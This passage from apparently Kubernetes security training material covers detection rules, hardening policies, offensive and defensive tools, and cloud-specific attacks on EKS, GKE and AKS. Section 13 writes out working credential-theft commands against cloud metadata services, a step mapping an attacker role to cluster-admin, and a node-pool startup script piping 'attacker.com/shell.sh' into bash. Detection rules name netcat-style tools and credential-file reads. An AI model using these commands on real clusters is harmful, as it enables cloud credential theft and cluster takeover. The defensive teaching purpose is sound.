     fd.name startswith "/etc/kubernetes" or
     fd.name contains "/serviceaccount/token" or
     fd.name contains "/.kube/config")
  output: >
    Sensitive file read in container (user=%user.name command=%proc.cmdline
    file=%fd.name container=%container.name)
  priority: HIGH
  tags: [container, credential_access, T1552]

- rule: Cloud Metadata Access from Container
  desc: Detect container accessing cloud instance metadata service
  condition: >
    container.id != "" and
    ((fd.sip = "169.254.169.254") or
     (fd.sip = "169.254.170.2")) and
    evt.type in (connect, sendto)
  output: >
    Cloud metadata service accessed from container
    (user=%user.name command=%proc.cmdline container=%container.name
    dest=%fd.sip:%fd.sport)
  priority: HIGH
  tags: [container, credential_access, T1552.005]

# === Lateral Movement Detection ===

- rule: Network Scanning Tool in Container
  desc: Detect network reconnaissance tools running in containers
  condition: >
    spawned_process and
    container.id != "" and
    (proc.name in (nmap, masscan, nping, netcat, nc, ncat, socat, arpspoof, tcpdump))
  output: >
    Network tool executed in container (user=%user.name command=%proc.cmdline
    container=%container.name image=%container.image.repository)
  priority: HIGH
  tags: [container, discovery, T1046]

# === Persistence Detection ===

- rule: Write to Kubernetes Static Pod Manifests
  desc: Detect writes to kubelet static pod manifest directory
  condition: >
    open_write and
    fd.name startswith "/etc/kubernetes/manifests/" and
    not proc.name in (kubelet, kubeadm)
  output: >
    Static pod manifest modified (user=%user.name command=%proc.cmdline
    file=%fd.name)
  priority: CRITICAL
  tags: [host, persistence, T1543.005]

- rule: Unexpected Shell in Container
  desc: Detect shell spawned in container (possible exec or RCE)
  condition: >
    spawned_process and
    container.id != "" and
    proc.name in (bash, sh, dash, zsh, csh, ksh, fish) and
    not proc.pname in (entrypoint.sh, start.sh, run.sh, docker-entrypoint.sh)
  output: >
    Shell spawned in container (user=%user.name shell=%proc.name parent=%proc.pname
    container=%container.name image=%container.image.repository)
  priority: WARNING
  tags: [container, execution, T1059]

# === Defense Evasion Detection ===

- rule: Kubernetes Event Deletion
  desc: Detect deletion of Kubernetes events (covering tracks)
  condition: >
    kevt and
    kdelete and
    ka.target.resource = "events"
  output: >
    Kubernetes events deleted (user=%ka.user.name namespace=%ka.target.namespace
    count=%ka.response.code)
  priority: HIGH
  tags: [k8s, defense_evasion, T1070]

- rule: Log File Truncation on Host
  desc: Detect truncation of container or kubelet log files
  condition: >
    open_write and
    (fd.name startswith "/var/log/containers/" or
     fd.name startswith "/var/log/pods/" or
     fd.name = "/var/log/kubelet.log") and
    evt.arg.flags contains "O_TRUNC"
  output: >
    Log file truncated (user=%user.name command=%proc.cmdline file=%fd.name)
  priority: HIGH
  tags: [host, defense_evasion, T1070]

10.2 Sigma Rules for API Audit Logs

# === Privilege Escalation ===

title: Kubernetes ClusterRoleBinding to cluster-admin Created
id: f8e2d3a1-b4c5-4d6e-8f9a-0b1c2d3e4f5a
status: experimental
description: Detects creation of ClusterRoleBinding with cluster-admin privileges
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: clusterrolebindings
  privilege:
    requestObject.roleRef.name: cluster-admin
  condition: selection and privilege
falsepositives:
  - Helm chart installations requiring cluster-admin
  - Operator deployments during initial cluster setup
level: critical
tags:
  - attack.t1098.006
  - attack.privilege_escalation
---
title: Kubernetes Impersonation Request
id: a2b3c4d5-e6f7-8901-abcd-ef2345678901
status: experimental
description: Detects API requests using user/group impersonation
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    impersonatedUser.username|exists: true
  filter_system:
    user.username|startswith: "system:"
    impersonatedUser.username|startswith: "system:"
  condition: selection and not filter_system
falsepositives:
  - Legitimate admin tools using impersonation for testing
level: high
tags:
  - attack.t1134
  - attack.privilege_escalation
---
title: Privileged Kubernetes Pod Created
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects creation of privileged pods enabling container escape
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: pods
  condition_priv:
    requestObject.spec.containers[*].securityContext.privileged: "true"
  condition: selection and condition_priv
falsepositives:
  - kube-proxy, CNI pods, and monitoring agents that require privileged mode
level: high
tags:
  - attack.t1611
  - attack.privilege_escalation
---
title: Bulk Secret Enumeration via Kubernetes API
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Detects listing all secrets across namespaces indicating credential harvesting
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: list
    objectRef.resource: secrets
    objectRef.namespace: ""
  condition: selection
falsepositives:
  - Backup controllers and security compliance scanners
level: critical
tags:
  - attack.t1528
  - attack.credential_access
---
title: Kubernetes Exec into Pod
id: d4e5f6a7-b8c9-0123-defg-456789012345
status: experimental
description: Detects exec operations into pods which may indicate lateral movement
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    verb: create
    objectRef.resource: pods
    objectRef.subresource: exec
  condition: selection
falsepositives:
  - Developers debugging pods in development namespaces
  - Automated health check systems
level: medium
tags:
  - attack.t1609
  - attack.execution
---
title: Admission Webhook Configuration Changed
id: e5f6a7b8-c9d0-1234-efgh-567890123456
status: experimental
description: Detects creation or modification of admission webhooks
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection_mutating:
    verb|re: "create|update|patch"
    objectRef.resource: mutatingwebhookconfigurations
  selection_validating:
    verb|re: "create|update|patch"
    objectRef.resource: validatingwebhookconfigurations
  condition: selection_mutating or selection_validating
falsepositives:
  - cert-manager and Istio webhook updates
  - Operator installations
level: high
tags:
  - attack.t1098
  - attack.persistence
---
title: Anonymous Kubernetes API Access
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects API server access by anonymous/unauthenticated users
logsource:
  category: kubernetes_audit
  product: kubernetes
detection:
  selection:
    user.username:
    - "system:anonymous"
  filter_health:
    objectRef.resource|re: "healthz|livez|readyz"
  condition: selection and not filter_health
falsepositives:
  - Load balancer health checks hitting non-health endpoints
level: high
tags:
  - attack.t1078.001
  - attack.initial_access

10.3 API Audit Log Policy

# Comprehensive audit policy for security monitoring
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
# Log all secret operations at RequestResponse level
- level: RequestResponse
  resources:
  - group: ""
    resources: ["secrets"]

# Log all RBAC changes
- level: RequestResponse
  resources:
  - group: "rbac.authorization.k8s.io"
    resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]

# Log pod exec and attach
- level: RequestResponse
  resources:
  - group: ""
    resources: ["pods/exec", "pods/attach", "pods/portforward"]

# Log admission webhook changes
- level: RequestResponse
  resources:
  - group: "admissionregistration.k8s.io"

# Log service account token creation
- level: RequestResponse
  resources:
  - group: ""
    resources: ["serviceaccounts/token"]

# Log node and namespace changes
- level: RequestResponse
  resources:
  - group: ""
    resources: ["nodes", "namespaces"]

# Log pod creation at Metadata level
- level: Metadata
  resources:
  - group: ""
    resources: ["pods"]
  - group: "apps"
    resources: ["deployments", "daemonsets", "statefulsets", "replicasets"]
  - group: "batch"
    resources: ["jobs", "cronjobs"]

# Log ConfigMap changes
- level: Metadata
  resources:
  - group: ""
    resources: ["configmaps"]

# Skip health checks and status updates
- level: None
  resources:
  - group: ""
    resources: ["events", "endpoints"]
- level: None
  users: ["system:kube-proxy"]
  verbs: ["watch"]
- level: None
  nonResourceURLs:
  - "/healthz*"
  - "/livez*"
  - "/readyz*"
  - "/metrics"

# Default: log everything else at Metadata
- level: Metadata

10.4 OPA/Gatekeeper Policies

# Block privileged containers
apiVersion: templates.gatekeeper.sh/v1
kind: ConstraintTemplate
metadata:
  name: k8sblockedprivileged
spec:
  crd:
    spec:
      names:
        kind: K8sBlockPrivileged
  targets:
  - target: admission.k8s.gatekeeper.sh
    rego: |
      package k8sblockedprivileged
      violation[{"msg": msg}] {
        container := input.review.object.spec.containers[_]
        container.securityContext.privileged == true
        msg := sprintf("Privileged container '%v' is not allowed", [container.name])
      }
      violation[{"msg": msg}] {
        container := input.review.object.spec.initContainers[_]
        container.securityContext.privileged == true
        msg := sprintf("Privileged init container '%v' is not allowed", [container.name])
      }
---
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sBlockPrivileged
metadata:
  name: block-privileged-containers
spec:
  match:
    kinds:
    - apiGroups: [""]
      kinds: ["Pod"]
    excludedNamespaces: ["kube-system"]

10.5 Kyverno Policies

# Block hostPath volumes
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-hostpath
  annotations:
    policies.kyverno.io/title: Block hostPath Volumes
    policies.kyverno.io/severity: high
spec:
  validationFailureAction: Enforce
  rules:
  - name: block-hostpath-volumes
    match:
      any:
      - resources:
          kinds:
          - Pod
    exclude:
      any:
      - resources:
          namespaces:
          - kube-system
    validate:
      message: "hostPath volumes are not allowed."
      pattern:
        spec:
          =(volumes):
          - X(hostPath): "null"
---
# Require non-root containers
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-run-as-non-root
spec:
  validationFailureAction: Enforce
  rules:
  - name: run-as-non-root
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Containers must run as non-root."
      pattern:
        spec:
          containers:
          - securityContext:
              runAsNonRoot: true
---
# Block cloud metadata access via NetworkPolicy generation
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: block-metadata-service
spec:
  rules:
  - name: generate-netpol-block-metadata
    match:
      any:
      - resources:
          kinds:
          - Namespace
    generate:
      kind: NetworkPolicy
      apiVersion: networking.k8s.io/v1
      name: block-cloud-metadata
      namespace: "{{request.object.metadata.name}}"
      data:
        spec:
          podSelector: {}
          policyTypes:
          - Egress
          egress:
          - to:
            - ipBlock:
                cidr: 0.0.0.0/0
                except:
                - 169.254.169.254/32

10.6 Runtime Monitoring with Tetragon

# Tetragon TracingPolicy for container escape detection
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
spec:
  kprobes:
  # Detect cgroup release_agent manipulation
  - call: "security_file_open"
    syscall: false
    args:
    - index: 0
      type: "file"
    selectors:
    - matchArgs:
      - index: 0
        operator: "Postfix"
        values:
        - "release_agent"
    - matchActions:
      - action: Sigkill  # Kill the process attempting the escape
  # Detect nsenter
  - call: "__x64_sys_setns"
    syscall: true
    args:
    - index: 0
      type: "int"
    selectors:
    - matchActions:
      - action: Post
        rateLimit: "1m"

11. Hardening

11.1 Pod Security Standards (PSS)

# Apply to namespaces via labels (Kubernetes 1.25+, replaces PodSecurityPolicy)
# Three profiles: Privileged (unrestricted), Baseline (minimally restrictive), Restricted (hardened)

# Enforce Restricted profile on a namespace
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/audit-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/warn-version: latest

Restricted profile blocks:

  • Privileged containers
  • hostPID, hostIPC, hostNetwork
  • hostPath volumes
  • Host ports
  • Capabilities beyond NET_BIND_SERVICE
  • Running as root
  • Privilege escalation
  • Non-default seccomp profiles
# Minimum compliant pod under Restricted profile
apiVersion: v1
kind: Pod
metadata:
  name: hardened-pod
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 1000
    fsGroup: 1000
    seccompProfile:
      type: RuntimeDefault
  containers:
  - name: app
    image: myapp:v1.0@sha256:abc123...
    securityContext:
      allowPrivilegeEscalation: false
      readOnlyRootFilesystem: true
      capabilities:
        drop: ["ALL"]
    resources:
      limits:
        cpu: "500m"
        memory: "256Mi"
      requests:
        cpu: "100m"
        memory: "128Mi"

11.2 Network Policies

# Default deny ALL traffic in namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress
---
# Allow only specific pod-to-pod communication
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080
---
# Block cloud metadata from all pods
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
---
# Allow DNS egress (required for service discovery)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-dns
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53
    - protocol: TCP
      port: 53

11.3 RBAC Least Privilege

# Dedicated service account per workload (never use default)
apiVersion: v1
kind: ServiceAccount
metadata:
  name: frontend-sa
  namespace: production
automountServiceAccountToken: false  # Don't mount unless needed
---
# Minimal Role -- only what the application needs
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: frontend-role
  namespace: production
rules:
- apiGroups: [""]
  resources: ["configmaps"]
  resourceNames: ["frontend-config"]  # Specific resource, not wildcard
  verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: frontend-binding
  namespace: production
subjects:
- kind: ServiceAccount
  name: frontend-sa
  namespace: production
roleRef:
  kind: Role
  name: frontend-role
  apiGroup: rbac.authorization.k8s.io
# RBAC audit commands
# Find all cluster-admin bindings
kubectl get clusterrolebindings -o json | jq '
  .items[] | select(.roleRef.name == "cluster-admin") |
  {name: .metadata.name, subjects: .subjects}'

# Find roles with wildcard permissions
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? | .verbs[]? == "*") |
  {name: .metadata.name}'

# Find service accounts that can access secrets
kubectl get clusterroles -o json | jq '
  .items[] | select(.rules[]? |
    (.resources[]? == "secrets") and
    ((.verbs[]? == "get") or (.verbs[]? == "list") or (.verbs[]? == "*"))
  ) | .metadata.name'

# Check specific SA permissions
kubectl auth can-i --list --as=system:serviceaccount:production:frontend-sa

# Tool: kubectl-who-can
kubectl who-can get secrets -A
kubectl who-can create pods -n kube-system
kubectl who-can create clusterrolebindings

11.4 Secrets Management with external-secrets

# External Secrets Operator syncs secrets from external providers
# Avoids storing secrets in etcd entirely

# SecretStore pointing to AWS Secrets Manager
apiVersion: external-secrets.io/v1beta1
kind: SecretStore
metadata:
  name: aws-secrets
  namespace: production
spec:
  provider:
    aws:
      service: SecretsManager
      region: us-east-1
      auth:
        jwt:
          serviceAccountRef:
            name: external-secrets-sa
---
# ExternalSecret that syncs from AWS
apiVersion: external-secrets.io/v1beta1
kind: ExternalSecret
metadata:
  name: db-credentials
  namespace: production
spec:
  refreshInterval: 1h
  secretStoreRef:
    name: aws-secrets
    kind: SecretStore
  target:
    name: db-credentials
    creationPolicy: Owner
  data:
  - secretKey: username
    remoteRef:
      key: production/db
      property: username
  - secretKey: password
    remoteRef:
      key: production/db
      property: password
---
# HashiCorp Vault provider
apiVersion: external-secrets.io/v1beta1
kind: SecretStore
metadata:
  name: vault
  namespace: production
spec:
  provider:
    vault:
      server: "https://vault.internal:8200"
      path: "secret"
      version: "v2"
      auth:
        kubernetes:
          mountPath: "kubernetes"
          role: "production-role"
          serviceAccountRef:
            name: vault-auth-sa

11.5 Control Plane Hardening Checklist

# API Server
--anonymous-auth=false
--authorization-mode=RBAC,Node
--enable-admission-plugins=NodeRestriction,PodSecurity,AlwaysPullImages
--audit-log-path=/var/log/kubernetes/audit/audit.log
--audit-policy-file=/etc/kubernetes/audit-policy.yaml
--audit-log-maxage=30
--audit-log-maxbackup=10
--audit-log-maxsize=100
--insecure-port=0
--profiling=false
--service-account-lookup=true
--kubelet-certificate-authority=/etc/kubernetes/pki/ca.crt
--tls-cipher-suites=TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,...
--encryption-provider-config=/etc/kubernetes/encryption-config.yaml

# etcd
--client-cert-auth=true
--peer-client-cert-auth=true
--trusted-ca-file=/etc/kubernetes/pki/etcd/ca.crt
# File permissions: chmod 700 /var/lib/etcd

# Kubelet
--anonymous-auth=false
--authorization-mode=Webhook
--read-only-port=0
--rotate-certificates=true
--protect-kernel-defaults=true
--streaming-connection-idle-timeout=5m
--tls-cert-file=...
--tls-private-key-file=...

# Encryption at rest config
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
  - secrets
  providers:
  - aescbc:
      keys:
      - name: key1
        secret: [BASE64_ENCODED_32_BYTE_KEY]
  - identity: {}  # Fallback for reading unencrypted secrets

11.6 Image Security

# Kyverno policy: require image signatures (cosign)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: verify-image-signatures
spec:
  validationFailureAction: Enforce
  rules:
  - name: verify-cosign-signature
    match:
      any:
      - resources:
          kinds:
          - Pod
    verifyImages:
    - imageReferences:
      - "registry.example.com/*"
      attestors:
      - count: 1
        entries:
        - keys:
            publicKeys: |-
              -----BEGIN PUBLIC KEY-----
              MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE...
              -----END PUBLIC KEY-----
---
# Kyverno policy: require image digests (no tags)
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: require-image-digest
spec:
  validationFailureAction: Enforce
  rules:
  - name: require-digest
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      message: "Images must use digest, not tag."
      pattern:
        spec:
          containers:
          - image: "*@sha256:*"

12. Offensive and Defensive Tooling

12.1 Offensive Tools

Tool Purpose Key Capability
CDK Container/K8s pentesting Zero-dep binary, 20+ escape exploits, K8s API attacks
Peirates K8s penetration testing SA token theft, pod exec, cloud metadata, registry brute
KubeHound Attack graph modeling BloodHound-style graph analysis of K8s attack paths
kube-hunter Vulnerability scanner External/internal scan, active exploitation, ATT&CK mapping
kubectl-who-can RBAC analysis Find who can perform specific actions
rbac-tool RBAC visualization Policy analysis, graph generation, audit
kubeaudit Security auditing Manifest scanning for misconfigurations
BOtB Container escape Break out the Box -- automated escape techniques
# CDK usage
cdk evaluate --full               # Comprehensive container evaluation
cdk run shim-pwn                  # CVE-2020-15257 containerd shim escape
cdk run mount-cgroup              # Cgroup release_agent escape
cdk run k8s-secret-dump           # Extract K8s secrets
cdk run k8s-backdoor-daemonset    # DaemonSet persistence
cdk probe [ip] [port] [parallel]  # Port scanning

# Peirates
./peirates                        # Interactive menu
# Options: switch SA, steal tokens, list secrets, exec in pods,
# create hostfs pods, cloud metadata, registry brute-force

# kubectl-who-can
kubectl who-can get secrets -n kube-system
kubectl who-can create pods -n default
kubectl who-can create clusterrolebindings
kubectl who-can impersonate users

# rbac-tool
rbac-tool lookup                  # Show all RBAC bindings
rbac-tool policy-rules            # Show effective permissions
rbac-tool who-can get secrets     # Similar to kubectl-who-can
rbac-tool viz                     # Generate graph visualization

12.2 Defensive Tools

Tool Purpose Deployment
kube-bench CIS benchmark Job or binary
Kubescape Multi-framework scanner CLI, CI/CD, operator
Falco Runtime threat detection DaemonSet
Tetragon eBPF observability DaemonSet
OPA/Gatekeeper Policy admission Admission webhook
Kyverno Policy engine Admission webhook
Polaris Best practice audit Dashboard, webhook, CLI
Popeye Cluster sanitizer CLI
kubesec Manifest risk scoring CLI, webhook
Trivy Vulnerability scanning CLI, operator
# kube-bench
kube-bench run --targets master
kube-bench run --targets node
kube-bench run --targets etcd
kube-bench run --benchmark eks-1.2.0

# Kubescape
kubescape scan framework nsa
kubescape scan framework mitre
kubescape scan framework cis-v1.23-t1.0.1
kubescape scan --format json --output results.json

# Trivy (image + K8s scanning)
trivy image nginx:latest
trivy k8s --report summary cluster
trivy k8s --report all --severity HIGH,CRITICAL

# Polaris
polaris audit --audit-path deployment.yaml
polaris audit --format=json

# kubesec
kubesec scan pod.yaml
# Scores: -30 CAP_SYS_ADMIN, -7 AllowPrivilegeEscalation, +1 runAsNonRoot

13. Cloud-Specific Kubernetes Attacks

13.1 AWS EKS -- IRSA Abuse

ATT&CK: T1078 (Valid Accounts), T1528 (Steal Application Access Token)

# IRSA (IAM Roles for Service Accounts) attack flow:
# 1. Find SAs with IAM role annotations
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["eks.amazonaws.com/role-arn"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   role: .metadata.annotations["eks.amazonaws.com/role-arn"]}'

# 2. Create a pod using the target SA
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: irsa-steal
  namespace: [TARGET_NS]
spec:
  serviceAccountName: [TARGET_SA]
  containers:
  - name: aws
    image: amazonlinux:2
    command: ["sleep", "infinity"]
EOF

# 3. The pod automatically gets AWS credentials via IRSA
kubectl exec -it irsa-steal -n [TARGET_NS] -- bash
aws sts get-caller-identity
aws s3 ls
aws iam list-roles

# EKS node IAM role abuse (from any pod without IMDS blocking)
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

# EKS-specific: aws-auth ConfigMap manipulation
# Controls IAM-to-K8s identity mapping
kubectl get configmap aws-auth -n kube-system -o yaml
# If you can edit this ConfigMap, you can map ANY IAM role to cluster-admin:
kubectl edit configmap aws-auth -n kube-system
# Add:
# - rolearn: arn:aws:iam::ATTACKER_ACCOUNT:role/attacker-role
#   username: cluster-admin
#   groups:
#   - system:masters

# EKS Pod Identity (newer mechanism)
# Check for pod identity associations
aws eks list-pod-identity-associations --cluster-name [CLUSTER]

Mitigation: Block IMDS from pods via NetworkPolicy. Use IMDSv2 with hop limit 1. Scope IRSA roles minimally. Protect aws-auth ConfigMap with OPA/Kyverno.

13.2 GCP GKE -- Workload Identity Abuse

# GKE Workload Identity maps K8s SAs to GCP SAs

# Find annotated service accounts
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["iam.gke.io/gcp-service-account"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   gsa: .metadata.annotations["iam.gke.io/gcp-service-account"]}'

# Create pod with target SA
kubectl run wi-steal --image=google/cloud-sdk \
  --serviceaccount=[TARGET_SA] -n [TARGET_NS] -- sleep infinity

# Get GCP access token
kubectl exec -it wi-steal -n [TARGET_NS] -- bash
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
gcloud auth list
gcloud projects list
gsutil ls

# GKE metadata concealment bypass
# Even with metadata concealment, Workload Identity tokens are available
# Attack: use WI token to access GCP services
gcloud auth activate-service-account --key-file=/dev/stdin << 'EOF'
... (use token from metadata)
EOF

# GKE node default SA often has broad permissions
# project-editor is common, which grants access to:
# - GCS buckets, GCR images, Compute instances, Cloud SQL, etc.

# GKE-specific: manipulate node pool metadata
# If you compromise the GKE control plane or have sufficient IAM:
gcloud container node-pools update [POOL] --cluster=[CLUSTER] \
  --metadata=startup-script='#!/bin/bash\ncurl http://attacker.com/shell.sh|bash'

Mitigation: Enable Workload Identity on all node pools. Disable legacy metadata endpoint. Use iam.gke.io/gcp-service-account annotations only where needed. Block metadata IP via NetworkPolicy.

13.3 Azure AKS -- AAD Integration Attacks

# AKS with Azure AD integration

# Azure Managed Identity from pods
TOKEN=$(curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
  | jq -r .access_token)

# List subscriptions with stolen token
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01"

# List all resources
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions/[SUB_ID]/resources?api-version=2021-04-01"

# Access Key Vault secrets
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://[VAULT_NAME].vault.azure.net/secrets?api-version=7.3"

# AKS AAD Pod Identity (legacy)
kubectl get azureidentities -A
kubectl get azureidentitybindings -A
# If you can create AzureIdentityBindings, you can assume any managed identity

# AKS Workload Identity (newer)
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["azure.workload.identity/client-id"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   clientId: .metadata.annotations["azure.workload.identity/client-id"]}'

# AKS-specific: cluster admin credential theft
# If you have Azure Contributor on the AKS resource:
az aks get-credentials --resource-group [RG] --name [CLUSTER] --admin
# This gives cluster-admin kubeconfig regardless of K8s RBAC

# AKS run command (execute on cluster from Azure portal/CLI)
az aks command invoke --resource-group [RG] --name [CLUSTER] \
  --command "kubectl get secrets -A"

Mitigation: Use AKS Workload Identity instead of Pod Identity. Disable managed identity on node pools where not needed. Restrict Azure RBAC on AKS resource. Enable AKS local accounts disable feature.

13.4 Cloud-Agnostic Mitigations

# Block IMDS from all pods (apply to every namespace)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-cloud-metadata
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
        - 169.254.170.2/32   # EKS pod identity agent
# AWS: set IMDS hop limit to 1 (blocks access from pods in container network)
aws ec2 modify-instance-metadata-options \
  --instance-id [INSTANCE_ID] \
  --http-put-response-hop-limit 1 \
  --http-tokens required

# GCP: enable workload identity on node pool (disables metadata for pods)
gcloud container node-pools update [POOL] --cluster=[CLUSTER] \
  --workload-metadata=GKE_METADATA

# Azure: disable IMDS for pods
# Use AKS network policy to block 169.254.169.254

Quick Reference: Attack Path Summary

+-----------------------------------------------------------------+
|                    K8s ATTACK PATHS                              |
+-----------------------------------------------------------------+
|                                                                  |
|  Initial Access                                                  |
|  +-- Exposed API server (anon auth)                              |
|  +-- Exposed dashboard (skip login)                              |
|  +-- Stolen kubeconfig                                           |
|  +-- Compromised CI/CD pipeline                                  |
|  +-- Application RCE (SSRF, injection)                           |
|  +-- Compromised container image                                 |
|  +-- Cloud credential theft -> cluster access                    |
|                                                                  |
|  Container -> Node Escalation                                    |
|  +-- Privileged pod -> cgroup/device/nsenter escape              |
|  +-- hostPath -> filesystem access -> cred theft                 |
|  +-- Docker/containerd socket -> new privileged container        |
|  +-- CVE exploitation (runc, containerd, kernel cgroups)         |
|  +-- Core pattern / SysRq abuse                                  |
|                                                                  |
|  Privilege Escalation                                            |
|  +-- RBAC: create pods -> use privileged SA                      |
|  +-- RBAC: bind roles -> grant cluster-admin                     |
|  +-- RBAC: escalate verb -> create god-mode role                 |
|  +-- RBAC: impersonate -> act as any user                        |
|  +-- RBAC: CSR signing -> forge certificates                     |
|  +-- Node to cluster via CA key / admin kubeconfig               |
|                                                                  |
|  Lateral Movement                                                |
|  +-- Pod-to-pod (no network policies)                            |
|  +-- SA token theft -> cross-namespace access                    |
|  +-- etcd access -> all cluster secrets                          |
|  +-- kubelet API -> exec in other pods                           |
|  +-- Cloud metadata -> IAM escalation                            |
|  +-- CoreDNS poisoning -> traffic redirect                       |
|  +-- ARP spoofing from hostNetwork pod                           |
|                                                                  |
|  Persistence                                                     |
|  +-- Admission webhook backdoor (sidecar injection)              |
|  +-- CronJob recurring execution                                 |
|  +-- Static pod (bypasses all admission)                         |
|  +-- DaemonSet on all nodes                                      |
|  +-- Container image backdoor                                    |
|  +-- Shadow API server                                           |
|                                                                  |
|  Credential Access                                               |
|  +-- K8s secrets via API                                         |
|  +-- etcd direct dump                                            |
|  +-- Mounted secrets / env vars                                  |
|  +-- Cloud IMDS credential theft                                 |
|  +-- IRSA / Workload Identity abuse                              |
|  +-- Image layer secrets                                         |
|                                                                  |
|  Data Exfiltration                                               |
|  +-- Volume mount access                                         |
|  +-- Sidecar injection                                           |
|  +-- DNS exfiltration                                            |
|  +-- Container registry theft                                    |
|  +-- HTTP/S egress                                               |
|                                                                  |
+-----------------------------------------------------------------+

Training material compiled from Kubernetes Goat, BishopFox BadPods, CDK, Peirates, KubeHound, kube-bench, kube-hunter, kubesec, Popeye, Kubescape, Polaris, Falco, Tetragon, OPA/Gatekeeper, Kyverno, external-secrets-operator, Microsoft Kubernetes Threat Matrix, and MITRE ATT&CK Containers Matrix.

PreviousCloud Attacks
NextC2 & Post-Exploitation

On this page

  • Table of Contents
  • 1. Kubernetes Threat Model
  • 1.1 Attack Surface Overview
  • 1.2 Component Threat Analysis
  • 1.3 Trust Boundaries
  • 1.4 Microsoft Kubernetes Threat Matrix
  • 1.5 MITRE ATT&CK Containers Matrix
  • 2. Initial Access
  • 2.1 Exposed Kubernetes Dashboard
  • 2.2 Anonymous Kubelet Access
  • 2.3 Anonymous API Server Access
  • 2.4 Misconfigured RBAC
  • 2.5 CI/CD Pipeline Compromise
  • 2.6 Exposed Sensitive Interfaces
  • 2.7 Application Vulnerability (SSRF to Internal Services)
  • 3. Container Escape Techniques
  • 3.1 Privileged Container Escapes
  • 3.2 hostPath Mount Escapes
  • 3.3 CVE-Based Container Escapes
  • 3.4 Ptrace-Based Escape
  • 3.5 Escape Summary Matrix
  • 4. Privilege Escalation
  • 4.1 RBAC Abuse -- Create Pods
  • 4.2 RBAC Abuse -- Bind Roles
  • 4.3 RBAC Abuse -- Escalate Verb
  • 4.4 RBAC Abuse -- Impersonate
  • 4.5 RBAC Abuse -- Token Request (create serviceaccounts/token)
  • 4.6 RBAC Abuse -- CSR Signing (Certificates)
  • 4.7 Node-to-Cluster Pivoting
  • 4.8 Service Account Token Theft
  • 4.9 Dangerous RBAC Permissions Reference
  • 5. Lateral Movement
  • 5.1 Pod-to-Pod via Network Policy Gaps
  • 5.2 Service Account Hopping
  • 5.3 etcd Direct Access
